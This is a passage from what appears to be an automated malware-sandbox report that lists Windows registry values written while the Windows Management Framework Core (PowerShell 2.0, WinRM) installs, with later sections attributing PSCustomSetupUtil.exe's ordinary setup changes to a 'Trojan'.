"ReleaseType" = "Software Update"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 6E FA 50 B6 97 86 7E F6 06 50 B0 DB B3 2C AE"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.PNF" = "1"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20151205"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The process PSCustomSetupUtil.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E6 EF 14 F0 7B A1 39 0D 54 F9 58 13 69 06 C7"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C2 5A 22 AF 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:2868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 BF 80 42 D8 24 4C 59 E1 92 C7 83 D0 CB A4 F7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "C0 4D 3F C4 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A AF 6A 0E 7E 15 09 0E CF FE D9 38 DC 88 CC BB"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "00 42 E5 AD 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:1784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 FC FA 14 E8 E6 DB 03 43 00 AA 9D 51 65 95 60"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "46 5F 6B B0 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 7A 15 50 E7 B0 BD 66 C6 0E DC 48 9A DC 57 98"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "D4 B1 C5 BB 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 AF D8 D2 8A 00 43 BF 9B 18 99 49 91 AB EA 27"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "EC 26 DE C5 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 89 FC 77 BF 3E 51 6B D5 83 AF FB A5 7D AD 1A"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "2A 0E A1 C4 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 04 38 0E C9 8E A5 1C 0A 00 36 26 70 C4 17 54"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "62 8E 6F B6 05 2F D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:3164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 C8 C1 22 55 06 6D A2 E0 31 46 3A BF AA 53 2D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "C6 F2 47 C5 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
